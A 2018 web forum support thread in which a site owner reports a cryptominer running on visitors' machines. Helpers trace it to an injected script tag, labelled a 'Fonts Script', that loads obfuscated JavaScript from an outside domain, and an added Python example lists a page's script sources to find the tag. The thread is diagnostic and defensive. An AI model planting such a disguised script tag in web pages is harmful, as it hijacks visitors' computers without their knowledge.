  #1  
Old 03-21-2018, 06:38 AM
MasturB MasturB is offline
 
Join Date: Jul 2013
Posts: 22
Forum users complaining bitmining malware is running.

Hello,

A few of my users have reported that my website currently has bitmining malware running whenever they visit it.

Their CPU activity monitors are skyrocketing when they enter my site and then it drops once they close it in the browser. Any suggestions?
  #2  
Old 03-21-2018, 01:37 PM
Dave Dave is offline
 
Join Date: May 2010
Posts: 2,583

View the source-code of your website and find the miner name, then search for that name in your theme's templates and/or plugins. We need a bit more information in order to help you, e.g. URL to the site.
  #3  
Old 03-21-2018, 05:36 PM
MasturB MasturB is offline
 
Join Date: Jul 2013
Posts: 22

Quote:
Originally Posted by Dave
View the source-code of your website and find the miner name, then search for that name in your theme's templates and/or plugins. We need a bit more information in order to help you, e.g. URL to the site.
Thanks Dave.

It's chopcountry.com
  #4  
Old 03-21-2018, 05:57 PM
final kaoss final kaoss is offline
 
Join Date: Apr 2006
Posts: 1,314

I notice that on your site, uBlock is blocking a resource from:
31.187.64.40
https://www.abuseipdb.com/whois/31.187.64.40
And
analytics-scripts.ml

Also your site is marked as infected.
https://sitecheck.sucuri.net/results...rums/forum.php
  #5  
Old 03-21-2018, 06:03 PM
MasturB MasturB is offline
 
Join Date: Jul 2013
Posts: 22

Quote:
Originally Posted by final kaoss
I notice that on your site, uBlock is blocking a resource from:
31.187.64.40
https://www.abuseipdb.com/whois/31.187.64.40
And
analytics-scripts.ml
I just got off the phone with GoDaddy Security Tech. He checked the SQL for GoDaddy Hosting, and oddly enough he said there was a Stats Collector in the script/software that was hoarding all the CPU resources.

He obviously wasn't allowed to go in Admin and look, but he seemed pretty confident it was a Stats thing that was using up all the CPU.

So the stats thing might be the analytics scripts you've found.
  #6  
Old 03-21-2018, 06:36 PM
Dave Dave is offline
 
Join Date: May 2010
Posts: 2,583

At the bottom of your page you have:
HTML Code:
<!-- Fonts Script -->
<script type="text/javascript" src="http://analytics-scripts.ml/js/sans-serif.js"></script>
<!-- End Fonts Script -->
which contains code that looks extremely fishy (obfuscated). I would remove it asap. It definitely does not look like a legitimate analytics script.
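The two steps suggested in this thread (list the scripts a page loads, then find which template carries the unexpected one), as an added example that is not part of the original posts. The site host `forum.example`, the allowlisted `cdn.example`, the sample page and the template names are constructed assumptions; only the "Fonts Script" tag comes from the thread.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page; the "Fonts Script" block is the one quoted in the thread.
SAMPLE_PAGE = """<html><head>
<script type="text/javascript" src="js/site.js"></script>
<script src="//cdn.example/lib.min.js"></script>
</head><body><p>forum content</p>
<!-- Fonts Script -->
<script type="text/javascript" src="http://analytics-scripts.ml/js/sans-serif.js"></script>
<!-- End Fonts Script -->
</body></html>"""
# Constructed stand-in for exported templates (hypothetical names -> template text).
SAMPLE_TEMPLATES = {
    "header": '<div id="header">logo</div>',
    "footer": '<div id="footer">links</div>\n<!-- Fonts Script -->\n'
              '<script src="http://analytics-scripts.ml/js/sans-serif.js"></script>',
}

class ScriptSrcCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.sources = []  # src attribute of every <script> tag seen

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.sources.append(src)

def unexpected_script_hosts(html, site_host, allowed_hosts):
    """Map each script host outside the allowlist to the URLs loaded from it."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    allowed = {site_host.lower()} | {h.lower() for h in allowed_hosts}
    flagged = {}
    for src in collector.sources:
        # Relative URLs have no hostname and are served by the site itself.
        host = (urlparse(src).hostname or site_host).lower()
        if host not in allowed:
            flagged.setdefault(host, []).append(src)
    return flagged

def templates_referencing(templates, needle):
    """Names of templates whose text contains the flagged host or file name."""
    return sorted(n for n, body in templates.items() if needle.lower() in body.lower())
```

Finding the template only locates the injected tag; how it got written there still has to be investigated, or it can be re-added after removal.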
  #7  
Old 03-21-2018, 06:39 PM
MasturB MasturB is offline
 
Join Date: Jul 2013
Posts: 22

Quote:
Originally Posted by Dave
At the bottom of your page you have:
HTML Code:
<!-- Fonts Script -->
<script type="text/javascript" src="http://analytics-scripts.ml/js/sans-serif.js"></script>
<!-- End Fonts Script -->
which contains code that looks extremely fishy (obfuscated). I would remove it asap. It definitely does not look like a legitimate analytics script.
How do I remove it?

Do I go through Admin panel? Keep in mind I'm practically a novice at this. When I bought the license and hosting in 2013, I was doing my best to learn on the fly and play around with stuff through trial and error to learn. But since the website has been running smooth with no issues for the last 5 years there was no reason for me to stay sharp on all of this.